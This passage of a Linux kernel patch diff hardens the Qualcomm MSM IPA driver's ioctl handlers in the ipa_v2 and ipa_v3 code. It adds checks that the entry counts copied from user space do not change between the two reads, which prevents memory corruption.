ipa_ioc_del_hdr *)header)->num_hdls * -- sizeof(struct ipa_hdr_del); -+ pre_entry * sizeof(struct ipa_hdr_del); - param = kzalloc(pyld_sz, GFP_KERNEL); - if (!param) { - retval = -ENOMEM; -@@ -705,6 +725,15 @@ static long ipa_ioctl(struct file *filp, unsigned int cmd, unsigned long arg) - retval = -EFAULT; - break; - } -+ /* add check in case user-space module compromised */ -+ if (unlikely(((struct ipa_ioc_del_hdr *)param)->num_hdls -+ != pre_entry)) { -+ IPAERR(" prevent memory 
corruption(%d not match %d)\n", -+ ((struct ipa_ioc_del_hdr *)param)->num_hdls, -+ pre_entry); -+ retval = -EINVAL; -+ break; -+ } - if (ipa2_del_hdr((struct ipa_ioc_del_hdr *)param)) { - retval = -EFAULT; - break; -@@ -721,10 +750,11 @@ static long ipa_ioctl(struct file *filp, unsigned int cmd, unsigned long arg) - retval = -EFAULT; - break; - } -+ pre_entry = -+ ((struct ipa_ioc_add_rt_rule *)header)->num_rules; - pyld_sz = - sizeof(struct ipa_ioc_add_rt_rule) + -- ((struct ipa_ioc_add_rt_rule *)header)->num_rules * -- sizeof(struct ipa_rt_rule_add); -+ pre_entry * sizeof(struct ipa_rt_rule_add); - param = kzalloc(pyld_sz, GFP_KERNEL); - if (!param) { - retval = -ENOMEM; -@@ -734,6 +764,16 @@ static long ipa_ioctl(struct file *filp, unsigned int cmd, unsigned long arg) - retval = -EFAULT; - break; - } -+ /* add check in case user-space module compromised */ -+ if (unlikely(((struct ipa_ioc_add_rt_rule *)param)->num_rules -+ != pre_entry)) { -+ IPAERR(" prevent memory corruption(%d not match %d)\n", -+ ((struct ipa_ioc_add_rt_rule *)param)-> -+ num_rules, -+ pre_entry); -+ retval = -EINVAL; -+ break; -+ } - if (ipa2_add_rt_rule((struct ipa_ioc_add_rt_rule *)param)) { - retval = -EFAULT; - break; -@@ -750,10 +790,11 @@ static long ipa_ioctl(struct file *filp, unsigned int cmd, unsigned long arg) - retval = -EFAULT; - break; - } -+ pre_entry = -+ ((struct ipa_ioc_mdfy_rt_rule *)header)->num_rules; - pyld_sz = - sizeof(struct ipa_ioc_mdfy_rt_rule) + -- ((struct ipa_ioc_mdfy_rt_rule *)header)->num_rules * -- sizeof(struct ipa_rt_rule_mdfy); -+ pre_entry * sizeof(struct ipa_rt_rule_mdfy); - param = kzalloc(pyld_sz, GFP_KERNEL); - if (!param) { - retval = -ENOMEM; -@@ -763,6 +804,16 @@ static long ipa_ioctl(struct file *filp, unsigned int cmd, unsigned long arg) - retval = -EFAULT; - break; - } -+ /* add check in case user-space module compromised */ -+ if (unlikely(((struct ipa_ioc_mdfy_rt_rule *)param)->num_rules -+ != pre_entry)) { -+ IPAERR(" prevent memory 
corruption(%d not match %d)\n", -+ ((struct ipa_ioc_mdfy_rt_rule *)param)-> -+ num_rules, -+ pre_entry); -+ retval = -EINVAL; -+ break; -+ } - if (ipa2_mdfy_rt_rule((struct ipa_ioc_mdfy_rt_rule *)param)) { - retval = -EFAULT; - break; -@@ -779,10 +830,11 @@ static long ipa_ioctl(struct file *filp, unsigned int cmd, unsigned long arg) - retval = -EFAULT; - break; - } -+ pre_entry = -+ ((struct ipa_ioc_del_rt_rule *)header)->num_hdls; - pyld_sz = - sizeof(struct ipa_ioc_del_rt_rule) + -- ((struct ipa_ioc_del_rt_rule *)header)->num_hdls * -- sizeof(struct ipa_rt_rule_del); -+ pre_entry * sizeof(struct ipa_rt_rule_del); - param = kzalloc(pyld_sz, GFP_KERNEL); - if (!param) { - retval = -ENOMEM; -@@ -792,6 +844,15 @@ static long ipa_ioctl(struct file *filp, unsigned int cmd, unsigned long arg) - retval = -EFAULT; - break; - } -+ /* add check in case user-space module compromised */ -+ if (unlikely(((struct ipa_ioc_del_rt_rule *)param)->num_hdls -+ != pre_entry)) { -+ IPAERR(" prevent memory corruption(%d not match %d)\n", -+ ((struct ipa_ioc_del_rt_rule *)param)->num_hdls, -+ pre_entry); -+ retval = -EINVAL; -+ break; -+ } - if (ipa2_del_rt_rule((struct ipa_ioc_del_rt_rule *)param)) { - retval = -EFAULT; - break; -@@ -808,10 +869,11 @@ static long ipa_ioctl(struct file *filp, unsigned int cmd, unsigned long arg) - retval = -EFAULT; - break; - } -+ pre_entry = -+ ((struct ipa_ioc_add_flt_rule *)header)->num_rules; - pyld_sz = - sizeof(struct ipa_ioc_add_flt_rule) + -- ((struct ipa_ioc_add_flt_rule *)header)->num_rules * -- sizeof(struct ipa_flt_rule_add); -+ pre_entry * sizeof(struct ipa_flt_rule_add); - param = kzalloc(pyld_sz, GFP_KERNEL); - if (!param) { - retval = -ENOMEM; -@@ -821,6 +883,16 @@ static long ipa_ioctl(struct file *filp, unsigned int cmd, unsigned long arg) - retval = -EFAULT; - break; - } -+ /* add check in case user-space module compromised */ -+ if (unlikely(((struct ipa_ioc_add_flt_rule *)param)->num_rules -+ != pre_entry)) { -+ IPAERR(" prevent 
memory corruption(%d not match %d)\n", -+ ((struct ipa_ioc_add_flt_rule *)param)-> -+ num_rules, -+ pre_entry); -+ retval = -EINVAL; -+ break; -+ } - if (ipa2_add_flt_rule((struct ipa_ioc_add_flt_rule *)param)) { - retval = -EFAULT; - break; -@@ -837,10 +909,11 @@ static long ipa_ioctl(struct file *filp, unsigned int cmd, unsigned long arg) - retval = -EFAULT; - break; - } -+ pre_entry = -+ ((struct ipa_ioc_del_flt_rule *)header)->num_hdls; - pyld_sz = - sizeof(struct ipa_ioc_del_flt_rule) + -- ((struct ipa_ioc_del_flt_rule *)header)->num_hdls * -- sizeof(struct ipa_flt_rule_del); -+ pre_entry * sizeof(struct ipa_flt_rule_del); - param = kzalloc(pyld_sz, GFP_KERNEL); - if (!param) { - retval = -ENOMEM; -@@ -850,6 +923,16 @@ static long ipa_ioctl(struct file *filp, unsigned int cmd, unsigned long arg) - retval = -EFAULT; - break; - } -+ /* add check in case user-space module compromised */ -+ if (unlikely(((struct ipa_ioc_del_flt_rule *)param)->num_hdls -+ != pre_entry)) { -+ IPAERR(" prevent memory corruption(%d not match %d)\n", -+ ((struct ipa_ioc_del_flt_rule *)param)-> -+ num_hdls, -+ pre_entry); -+ retval = -EINVAL; -+ break; -+ } - if (ipa2_del_flt_rule((struct ipa_ioc_del_flt_rule *)param)) { - retval = -EFAULT; - break; -@@ -866,10 +949,11 @@ static long ipa_ioctl(struct file *filp, unsigned int cmd, unsigned long arg) - retval = -EFAULT; - break; - } -+ pre_entry = -+ ((struct ipa_ioc_mdfy_flt_rule *)header)->num_rules; - pyld_sz = - sizeof(struct ipa_ioc_mdfy_flt_rule) + -- ((struct ipa_ioc_mdfy_flt_rule *)header)->num_rules * -- sizeof(struct ipa_flt_rule_mdfy); -+ pre_entry * sizeof(struct ipa_flt_rule_mdfy); - param = kzalloc(pyld_sz, GFP_KERNEL); - if (!param) { - retval = -ENOMEM; -@@ -879,6 +963,16 @@ static long ipa_ioctl(struct file *filp, unsigned int cmd, unsigned long arg) - retval = -EFAULT; - break; - } -+ /* add check in case user-space module compromised */ -+ if (unlikely(((struct ipa_ioc_mdfy_flt_rule *)param)->num_rules -+ != pre_entry)) 
{ -+ IPAERR(" prevent memory corruption(%d not match %d)\n", -+ ((struct ipa_ioc_mdfy_flt_rule *)param)-> -+ num_rules, -+ pre_entry); -+ retval = -EINVAL; -+ break; -+ } - if (ipa2_mdfy_flt_rule((struct ipa_ioc_mdfy_flt_rule *)param)) { - retval = -EFAULT; - break; -@@ -992,9 +1086,10 @@ static long ipa_ioctl(struct file *filp, unsigned int cmd, unsigned long arg) - retval = -EFAULT; - break; - } -- -- pyld_sz = sz + ((struct ipa_ioc_query_intf_tx_props *) -- header)->num_tx_props * -+ pre_entry = -+ ((struct ipa_ioc_query_intf_tx_props *) -+ header)->num_tx_props; -+ pyld_sz = sz + pre_entry * - sizeof(struct ipa_ioc_tx_intf_prop); - param = kzalloc(pyld_sz, GFP_KERNEL); - if (!param) { -@@ -1005,6 +1100,16 @@ static long ipa_ioctl(struct file *filp, unsigned int cmd, unsigned long arg) - retval = -EFAULT; - break; - } -+ /* add check in case user-space module compromised */ -+ if (unlikely(((struct ipa_ioc_query_intf_tx_props *) -+ param)->num_tx_props -+ != pre_entry)) { -+ IPAERR(" prevent memory corruption(%d not match %d)\n", -+ ((struct ipa_ioc_query_intf_tx_props *) -+ param)->num_tx_props, pre_entry); -+ retval = -EINVAL; -+ break; -+ } - if (ipa_query_intf_tx_props( - (struct ipa_ioc_query_intf_tx_props *)param)) { - retval = -1; -@@ -1027,9 +1132,10 @@ static long ipa_ioctl(struct file *filp, unsigned int cmd, unsigned long arg) - retval = -EFAULT; - break; - } -- -- pyld_sz = sz + ((struct ipa_ioc_query_intf_rx_props *) -- header)->num_rx_props * -+ pre_entry = -+ ((struct ipa_ioc_query_intf_rx_props *) -+ header)->num_rx_props; -+ pyld_sz = sz + pre_entry * - sizeof(struct ipa_ioc_rx_intf_prop); - param = kzalloc(pyld_sz, GFP_KERNEL); - if (!param) { -@@ -1040,6 +1146,15 @@ static long ipa_ioctl(struct file *filp, unsigned int cmd, unsigned long arg) - retval = -EFAULT; - break; - } -+ /* add check in case user-space module compromised */ -+ if (unlikely(((struct ipa_ioc_query_intf_rx_props *) -+ param)->num_rx_props != pre_entry)) { -+ IPAERR(" 
prevent memory corruption(%d not match %d)\n", -+ ((struct ipa_ioc_query_intf_rx_props *) -+ param)->num_rx_props, pre_entry); -+ retval = -EINVAL; -+ break; -+ } - if (ipa_query_intf_rx_props( - (struct ipa_ioc_query_intf_rx_props *)param)) { - retval = -1; -@@ -1062,9 +1177,10 @@ static long ipa_ioctl(struct file *filp, unsigned int cmd, unsigned long arg) - retval = -EFAULT; - break; - } -- -- pyld_sz = sz + ((struct ipa_ioc_query_intf_ext_props *) -- header)->num_ext_props * -+ pre_entry = -+ ((struct ipa_ioc_query_intf_ext_props *) -+ header)->num_ext_props; -+ pyld_sz = sz + pre_entry * - sizeof(struct ipa_ioc_ext_intf_prop); - param = kzalloc(pyld_sz, GFP_KERNEL); - if (!param) { -@@ -1075,6 +1191,15 @@ static long ipa_ioctl(struct file *filp, unsigned int cmd, unsigned long arg) - retval = -EFAULT; - break; - } -+ /* add check in case user-space module compromised */ -+ if (unlikely(((struct ipa_ioc_query_intf_ext_props *) -+ param)->num_ext_props != pre_entry)) { -+ IPAERR(" prevent memory corruption(%d not match %d)\n", -+ ((struct ipa_ioc_query_intf_ext_props *) -+ param)->num_ext_props, pre_entry); -+ retval = -EINVAL; -+ break; -+ } - if (ipa_query_intf_ext_props( - (struct ipa_ioc_query_intf_ext_props *)param)) { - retval = -1; -@@ -1091,8 +1216,10 @@ static long ipa_ioctl(struct file *filp, unsigned int cmd, unsigned long arg) - retval = -EFAULT; - break; - } -- pyld_sz = sizeof(struct ipa_msg_meta) + -+ pre_entry = - ((struct ipa_msg_meta *)header)->msg_len; -+ pyld_sz = sizeof(struct ipa_msg_meta) + -+ pre_entry; - param = kzalloc(pyld_sz, GFP_KERNEL); - if (!param) { - retval = -ENOMEM; -@@ -1102,6 +1229,15 @@ static long ipa_ioctl(struct file *filp, unsigned int cmd, unsigned long arg) - retval = -EFAULT; - break; - } -+ /* add check in case user-space module compromised */ -+ if (unlikely(((struct ipa_msg_meta *)param)->msg_len -+ != pre_entry)) { -+ IPAERR(" prevent memory corruption(%d not match %d)\n", -+ ((struct ipa_msg_meta 
*)param)->msg_len, -+ pre_entry); -+ retval = -EINVAL; -+ break; -+ } - if (ipa_pull_msg((struct ipa_msg_meta *)param, - (char *)param + sizeof(struct ipa_msg_meta), - ((struct ipa_msg_meta *)param)->msg_len) != -@@ -1218,10 +1354,12 @@ static long ipa_ioctl(struct file *filp, unsigned int cmd, unsigned long arg) - retval = -EFAULT; - break; - } -+ pre_entry = -+ ((struct ipa_ioc_add_hdr_proc_ctx *) -+ header)->num_proc_ctxs; - pyld_sz = - sizeof(struct ipa_ioc_add_hdr_proc_ctx) + -- ((struct ipa_ioc_add_hdr_proc_ctx *)header)->num_proc_ctxs * -- sizeof(struct ipa_hdr_proc_ctx_add); -+ pre_entry * sizeof(struct ipa_hdr_proc_ctx_add); - param = kzalloc(pyld_sz, GFP_KERNEL); - if (!param) { - retval = -ENOMEM; -@@ -1231,6 +1369,15 @@ static long ipa_ioctl(struct file *filp, unsigned int cmd, unsigned long arg) - retval = -EFAULT; - break; - } -+ /* add check in case user-space module compromised */ -+ if (unlikely(((struct ipa_ioc_add_hdr_proc_ctx *) -+ param)->num_proc_ctxs != pre_entry)) { -+ IPAERR(" prevent memory corruption(%d not match %d)\n", -+ ((struct ipa_ioc_add_hdr_proc_ctx *) -+ param)->num_proc_ctxs, pre_entry); -+ retval = -EINVAL; -+ break; -+ } - if (ipa2_add_hdr_proc_ctx( - (struct ipa_ioc_add_hdr_proc_ctx *)param)) { - retval = -EFAULT; -@@ -1247,10 +1394,11 @@ static long ipa_ioctl(struct file *filp, unsigned int cmd, unsigned long arg) - retval = -EFAULT; - break; - } -+ pre_entry = -+ ((struct ipa_ioc_del_hdr_proc_ctx *)header)->num_hdls; - pyld_sz = - sizeof(struct ipa_ioc_del_hdr_proc_ctx) + -- ((struct ipa_ioc_del_hdr_proc_ctx *)header)->num_hdls * -- sizeof(struct ipa_hdr_proc_ctx_del); -+ pre_entry * sizeof(struct ipa_hdr_proc_ctx_del); - param = kzalloc(pyld_sz, GFP_KERNEL); - if (!param) { - retval = -ENOMEM; -@@ -1260,6 +1408,16 @@ static long ipa_ioctl(struct file *filp, unsigned int cmd, unsigned long arg) - retval = -EFAULT; - break; - } -+ /* add check in case user-space module compromised */ -+ if (unlikely(((struct 
ipa_ioc_del_hdr_proc_ctx *) -+ param)->num_hdls != pre_entry)) { -+ IPAERR(" prevent memory corruption( %d not match %d)\n", -+ ((struct ipa_ioc_del_hdr_proc_ctx *)param)-> -+ num_hdls, -+ pre_entry); -+ retval = -EINVAL; -+ break; -+ } - if (ipa2_del_hdr_proc_ctx( - (struct ipa_ioc_del_hdr_proc_ctx *)param)) { - retval = -EFAULT; -diff --git a/drivers/platform/msm/ipa/ipa_v3/ipa.c b/drivers/platform/msm/ipa/ipa_v3/ipa.c -index 041b461..d7e98eb 100644 ---- a/drivers/platform/msm/ipa/ipa_v3/ipa.c -+++ b/drivers/platform/msm/ipa/ipa_v3/ipa.c -@@ -592,6 +592,7 @@ static long ipa3_ioctl(struct file *filp, unsigned int cmd, unsigned long arg) - struct ipa_ioc_v4_nat_del nat_del; - struct ipa_ioc_rm_dependency rm_depend; - size_t sz; -+ int pre_entry; - - IPADBG("cmd=%x nr=%d\n", cmd, _IOC_NR(cmd)); - -@@ -645,11 +646,11 @@ static long ipa3_ioctl(struct file *filp, unsigned int cmd, unsigned long arg) - retval = -EFAULT; - break; - } -- -+ pre_entry = -+ ((struct ipa_ioc_nat_dma_cmd *)header)->entries; - pyld_sz = - sizeof(struct ipa_ioc_nat_dma_cmd) + -- ((struct ipa_ioc_nat_dma_cmd *)header)->entries * -- sizeof(struct ipa_ioc_nat_dma_one); -+ pre_entry * sizeof(struct ipa_ioc_nat_dma_one); - param = kzalloc(pyld_sz, GFP_KERNEL); - if (!param) { - retval = -ENOMEM; -@@ -660,7 +661,15 @@ static long ipa3_ioctl(struct file *filp, unsigned int cmd, unsigned long arg) - retval = -EFAULT; - break; - } -- -+ /* add check in case user-space module compromised */ -+ if (unlikely(((struct ipa_ioc_nat_dma_cmd *)param)->entries -+ != pre_entry)) { -+ IPAERR(" prevent memory corruption(%d not match %d)\n", -+ ((struct ipa_ioc_nat_dma_cmd *)param)->entries, -+ pre_entry); -+ retval = -EINVAL; -+ break; -+ } - if (ipa3_nat_dma_cmd((struct ipa_ioc_nat_dma_cmd *)param)) { - retval = -EFAULT; - break; -@@ -685,10 +694,11 @@ static long ipa3_ioctl(struct file *filp, unsigned int cmd, unsigned long arg) - retval = -EFAULT; - break; - } -+ pre_entry = -+ ((struct ipa_ioc_add_hdr 
*)header)->num_hdrs; - pyld_sz = - sizeof(struct ipa_ioc_add_hdr) + -- ((struct ipa_ioc_add_hdr *)header)->num_hdrs * -- sizeof(struct ipa_hdr_add); -+ pre_entry * sizeof(struct ipa_hdr_add); - param = kzalloc(pyld_sz, GFP_KERNEL); - if (!param) { - retval = -ENOMEM; -@@ -698,6 +708,15 @@ static long ipa3_ioctl(struct file *filp, unsigned int cmd, unsigned long arg) - retval = -EFAULT; - break; - } -+ /* add check in case user-space module compromised */ -+ if (unlikely(((struct ipa_ioc_add_hdr *)param)->num_hdrs -+ != pre_entry)) { -+ IPAERR(" prevent memory corruption(%d not match %d)\n", -+ ((struct ipa_ioc_add_hdr *)param)->num_hdrs, -+ pre_entry); -+ retval = -EINVAL; -+ break; -+ } - if (ipa3_add_hdr((struct ipa_ioc_add_hdr *)param)) { - retval = -EFAULT; - break; -@@ -714,10 +733,11 @@ static long ipa3_ioctl(struct file *filp, unsigned int cmd, unsigned long arg) - retval = -EFAULT; - break; - } -+ pre_entry = -+ ((struct ipa_ioc_del_hdr *)header)->num_hdls; - pyld_sz = - sizeof(struct ipa_ioc_del_hdr) + -- ((struct ipa_ioc_del_hdr *)header)->num_hdls * -- sizeof(struct ipa_hdr_del); -+ pre_entry * sizeof(struct ipa_hdr_del); - param = kzalloc(pyld_sz, GFP_KERNEL); - if (!param) { - retval = -ENOMEM; -@@ -727,6 +747,15 @@ static long ipa3_ioctl(struct file *filp, unsigned int cmd, unsigned long arg) - retval = -EFAULT; - break; - } -+ /* add check in case user-space module compromised */ -+ if (unlikely(((struct ipa_ioc_del_hdr *)param)->num_hdls -+ != pre_entry)) { -+ IPAERR(" prevent memory corruption(%d not match %d)\n", -+ ((struct ipa_ioc_del_hdr *)param)->num_hdls, -+ pre_entry); -+ retval = -EINVAL; -+ break; -+ } - if (ipa3_del_hdr((struct ipa_ioc_del_hdr *)param)) { - retval = -EFAULT; - break; -@@ -743,10 +772,11 @@ static long ipa3_ioctl(struct file *filp, unsigned int cmd, unsigned long arg) - retval = -EFAULT; - break; - } -+ pre_entry = -+ ((struct ipa_ioc_add_rt_rule *)header)->num_rules; - pyld_sz = - sizeof(struct ipa_ioc_add_rt_rule) + -- 
((struct ipa_ioc_add_rt_rule *)header)->num_rules * -- sizeof(struct ipa_rt_rule_add); -+ pre_entry * sizeof(struct ipa_rt_rule_add); - param = kzalloc(pyld_sz, GFP_KERNEL); - if (!param) { - retval = -ENOMEM; -@@ -756,6 +786,16 @@ static long ipa3_ioctl(struct file *filp, unsigned int cmd, unsigned long arg) - retval = -EFAULT; - break; - } -+ /* add check in case user-space module compromised */ -+ if (unlikely(((struct ipa_ioc_add_rt_rule *)param)->num_rules -+ != pre_entry)) { -+ IPAERR(" prevent memory corruption(%d not match %d)\n", -+ ((struct ipa_ioc_add_rt_rule *)param)-> -+ num_rules, -+ pre_entry); -+ retval = -EINVAL; -+ break; -+ } - if (ipa3_add_rt_rule((struct ipa_ioc_add_rt_rule *)param)) { - retval = -EFAULT; - break; -@@ -772,10 +812,11 @@ static long ipa3_ioctl(struct file *filp, unsigned int cmd, unsigned long arg) - retval = -EFAULT; - break; - } -+ pre_entry = -+ ((struct ipa_ioc_add_rt_rule_after *)header)->num_rules; - pyld_sz = - sizeof(struct ipa_ioc_add_rt_rule_after) + -- ((struct ipa_ioc_add_rt_rule_after *)header)->num_rules * -- sizeof(struct ipa_rt_rule_add); -+ pre_entry * sizeof(struct ipa_rt_rule_add); - param = kzalloc(pyld_sz, GFP_KERNEL); - if (!param) { - retval = -ENOMEM; -@@ -785,6 +826,16 @@ static long ipa3_ioctl(struct file *filp, unsigned int cmd, unsigned long arg) - retval = -EFAULT; - break; - } -+ /* add check in case user-space module compromised */ -+ if (unlikely(((struct ipa_ioc_add_rt_rule_after *)param)-> -+ num_rules != pre_entry)) { -+ IPAERR(" prevent memory corruption(%d not match %d)\n", -+ ((struct ipa_ioc_add_rt_rule_after *)param)-> -+ num_rules, -+ pre_entry); -+ retval = -EINVAL; -+ break; -+ } - if (ipa3_add_rt_rule_after( - (struct ipa_ioc_add_rt_rule_after *)param)) { - -@@ -803,10 +854,11 @@ static long ipa3_ioctl(struct file *filp, unsigned int cmd, unsigned long arg) - retval = -EFAULT; - break; - } -+ pre_entry = -+ ((struct ipa_ioc_mdfy_rt_rule *)header)->num_rules; - pyld_sz = - sizeof(struct 
ipa_ioc_mdfy_rt_rule) + -- ((struct ipa_ioc_mdfy_rt_rule *)header)->num_rules * -- sizeof(struct ipa_rt_rule_mdfy); -+ pre_entry * sizeof(struct ipa_rt_rule_mdfy); - param = kzalloc(pyld_sz, GFP_KERNEL); - if (!param) { - retval = -ENOMEM; -@@ -816,6 +868,16 @@ static long ipa3_ioctl(struct file *filp, unsigned int cmd, unsigned long arg) - retval = -EFAULT; - break; - } -+ /* add check in case user-space module compromised */ -+ if (unlikely(((struct ipa_ioc_mdfy_rt_rule *)param)->num_rules -+ != pre_entry)) { -+ IPAERR(" prevent memory corruption(%d not match %d)\n", -+ ((struct ipa_ioc_mdfy_rt_rule *)param)-> -+ num_rules, -+ pre_entry); -+ retval = -EINVAL; -+ break; -+ } - if (ipa3_mdfy_rt_rule((struct ipa_ioc_mdfy_rt_rule *)param)) { - retval = -EFAULT; - break; -@@ -832,10 +894,11 @@ static long ipa3_ioctl(struct file *filp, unsigned int cmd, unsigned long arg) - retval = -EFAULT; - break; - } -+ pre_entry = -+ ((struct ipa_ioc_del_rt_rule *)header)->num_hdls; - pyld_sz = - sizeof(struct ipa_ioc_del_rt_rule) + -- ((struct ipa_ioc_del_rt_rule *)header)->num_hdls * -- sizeof(struct ipa_rt_rule_del); -+ pre_entry * sizeof(struct ipa_rt_rule_del); - param = kzalloc(pyld_sz, GFP_KERNEL); - if (!param) { - retval = -ENOMEM; -@@ -845,6 +908,15 @@ static long ipa3_ioctl(struct file *filp, unsigned int cmd, unsigned long arg) - retval = -EFAULT; - break; - } -+ /* add check in case user-space module compromised */ -+ if (unlikely(((struct ipa_ioc_del_rt_rule *)param)->num_hdls -+ != pre_entry)) { -+ IPAERR(" prevent memory corruption(%d not match %d)\n", -+ ((struct ipa_ioc_del_rt_rule *)param)->num_hdls, -+ pre_entry); -+ retval = -EINVAL; -+ break; -+ } - if (ipa3_del_rt_rule((struct ipa_ioc_del_rt_rule *)param)) { - retval = -EFAULT; - break; -@@ -861,10 +933,11 @@ static long ipa3_ioctl(struct file *filp, unsigned int cmd, unsigned long arg) - retval = -EFAULT; - break; - } -+ pre_entry = -+ ((struct ipa_ioc_add_flt_rule *)header)->num_rules; - pyld_sz = - 
sizeof(struct ipa_ioc_add_flt_rule) + -- ((struct ipa_ioc_add_flt_rule *)header)->num_rules * -- sizeof(struct ipa_flt_rule_add); -+ pre_entry * sizeof(struct ipa_flt_rule_add); - param = kzalloc(pyld_sz, GFP_KERNEL); - if (!param) { - retval = -ENOMEM; -@@ -874,6 +947,16 @@ static long ipa3_ioctl(struct file *filp, unsigned int cmd, unsigned long arg) - retval = -EFAULT; - break; - } -+ /* add check in case user-space module compromised */ -+ if (unlikely(((struct ipa_ioc_add_flt_rule *)param)->num_rules -+ != pre_entry)) { -+ IPAERR(" prevent memory corruption(%d not match %d)\n", -+ ((struct ipa_ioc_add_flt_rule *)param)-> -+ num_rules, -+ pre_entry); -+ retval = -EINVAL; -+ break; -+ } - if (ipa3_add_flt_rule((struct ipa_ioc_add_flt_rule *)param)) { - retval = -EFAULT; - break; -@@ -891,10 +974,12 @@ static long ipa3_ioctl(struct file *filp, unsigned int cmd, unsigned long arg) - retval = -EFAULT; - break; - } -+ pre_entry = -+ ((struct ipa_ioc_add_flt_rule_after *)header)-> -+ num_rules; - pyld_sz = - sizeof(struct ipa_ioc_add_flt_rule_after) + -- ((struct ipa_ioc_add_flt_rule_after *)header)->num_rules * -- sizeof(struct ipa_flt_rule_add); -+ pre_entry * sizeof(struct ipa_flt_rule_add); - param = kzalloc(pyld_sz, GFP_KERNEL); - if (!param) { - retval = -ENOMEM; -@@ -904,6 +989,16 @@ static long ipa3_ioctl(struct file *filp, unsigned int cmd, unsigned long arg) - retval = -EFAULT; - break; - } -+ /* add check in case user-space module compromised */ -+ if (unlikely(((struct ipa_ioc_add_flt_rule_after *)param)-> -+ num_rules != pre_entry)) { -+ IPAERR(" prevent memory corruption(%d not match %d)\n", -+ ((struct ipa_ioc_add_flt_rule_after *)param)-> -+ num_rules, -+ pre_entry); -+ retval = -EINVAL; -+ break; -+ } - if (ipa3_add_flt_rule_after( - (struct ipa_ioc_add_flt_rule_after *)param)) { - retval = -EFAULT; -@@ -921,10 +1016,11 @@ static long ipa3_ioctl(struct file *filp, unsigned int cmd, unsigned long arg) - retval = -EFAULT; - break; - } -+ pre_entry = -+ 
((struct ipa_ioc_del_flt_rule *)header)->num_hdls; - pyld_sz = - sizeof(struct ipa_ioc_del_flt_rule) + -- ((struct ipa_ioc_del_flt_rule *)header)->num_hdls * -- sizeof(struct ipa_flt_rule_del); -+ pre_entry * sizeof(struct ipa_flt_rule_del); - param = kzalloc(pyld_sz, GFP_KERNEL); - if (!param) { - retval = -ENOMEM; -@@ -934,6 +1030,16 @@ static long ipa3_ioctl(struct file *filp, unsigned int cmd, unsigned long arg) - retval = -EFAULT; - break; - } -+ /* add check in case user-space module compromised */ -+ if (unlikely(((struct ipa_ioc_del_flt_rule *)param)->num_hdls -+ != pre_entry)) { -+ IPAERR(" prevent memory corruption(%d not match %d)\n", -+ ((struct ipa_ioc_del_flt_rule *)param)-> -+ num_hdls, -+ pre_entry); -+ retval = -EINVAL; -+ break; -+ } - if (ipa3_del_flt_rule((struct ipa_ioc_del_flt_rule *)param)) { - retval = -EFAULT; - break; -@@ -950,10 +1056,11 @@ static long ipa3_ioctl(struct file *filp, unsigned int cmd, unsigned long arg) - retval = -EFAULT; - break; - } -+ pre_entry = -+ ((struct ipa_ioc_mdfy_flt_rule *)header)->num_rules; - pyld_sz = - sizeof(struct ipa_ioc_mdfy_flt_rule) + -- ((struct ipa_ioc_mdfy_flt_rule *)header)->num_rules * -- sizeof(struct ipa_flt_rule_mdfy); -+ pre_entry * sizeof(struct ipa_flt_rule_mdfy); - param = kzalloc(pyld_sz, GFP_KERNEL); - if (!param) { - retval = -ENOMEM; -@@ -963,6 +1070,16 @@ static long ipa3_ioctl(struct file *filp, unsigned int cmd, unsigned long arg) - retval = -EFAULT; - break; - } -+ /* add check in case user-space module compromised */ -+ if (unlikely(((struct ipa_ioc_mdfy_flt_rule *)param)->num_rules -+ != pre_entry)) { -+ IPAERR(" prevent memory corruption(%d not match %d)\n", -+ ((struct ipa_ioc_mdfy_flt_rule *)param)-> -+ num_rules, -+ pre_entry); -+ retval = -EINVAL; -+ break; -+ } - if (ipa3_mdfy_flt_rule((struct ipa_ioc_mdfy_flt_rule *)param)) { - retval = -EFAULT; - break; -@@ -1076,9 +1193,10 @@ static long ipa3_ioctl(struct file *filp, unsigned int cmd, unsigned long arg) - retval = 
-EFAULT; - break; - } -- -- pyld_sz = sz + ((struct ipa_ioc_query_intf_tx_props *) -- header)->num_tx_props * -+ pre_entry = -+ ((struct ipa_ioc_query_intf_tx_props *) -+ header)->num_tx_props; -+ pyld_sz = sz + pre_entry * - sizeof(struct ipa_ioc_tx_intf_prop); - param = kzalloc(pyld_sz, GFP_KERNEL); - if (!param) { -@@ -1089,6 +1207,16 @@ static long ipa3_ioctl(struct file *filp, unsigned int cmd, unsigned long arg) - retval = -EFAULT; - break; - } -+ /* add check in case user-space module compromised */ -+ if (unlikely(((struct ipa_ioc_query_intf_tx_props *) -+ param)->num_tx_props -+ != pre_entry)) { -+ IPAERR(" prevent memory corruption(%d not match %d)\n", -+ ((struct ipa_ioc_query_intf_tx_props *) -+ param)->num_tx_props, pre_entry); -+ retval = -EINVAL; -+ break; -+ } - if (ipa3_query_intf_tx_props( - (struct ipa_ioc_query_intf_tx_props *)param)) { - retval = -1; -@@ -1111,9 +1239,10 @@ static long ipa3_ioctl(struct file *filp, unsigned int cmd, unsigned long arg) - retval = -EFAULT; - break; - } -- -- pyld_sz = sz + ((struct ipa_ioc_query_intf_rx_props *) -- header)->num_rx_props * -+ pre_entry = -+ ((struct ipa_ioc_query_intf_rx_props *) -+ header)->num_rx_props; -+ pyld_sz = sz + pre_entry * - sizeof(struct ipa_ioc_rx_intf_prop); - param = kzalloc(pyld_sz, GFP_KERNEL); - if (!param) { -@@ -1124,6 +1253,15 @@ static long ipa3_ioctl(struct file *filp, unsigned int cmd, unsigned long arg) - retval = -EFAULT; - break; - } -+ /* add check in case user-space module compromised */ -+ if (unlikely(((struct ipa_ioc_query_intf_rx_props *) -+ param)->num_rx_props != pre_entry)) { -+ IPAERR(" prevent memory corruption(%d not match %d)\n", -+ ((struct ipa_ioc_query_intf_rx_props *) -+ param)->num_rx_props, pre_entry); -+ retval = -EINVAL; -+ break; -+ } - if (ipa3_query_intf_rx_props( - (struct ipa_ioc_query_intf_rx_props *)param)) { - retval = -1; -@@ -1146,9 +1284,10 @@ static long ipa3_ioctl(struct file *filp, unsigned int cmd, unsigned long arg) - retval = 
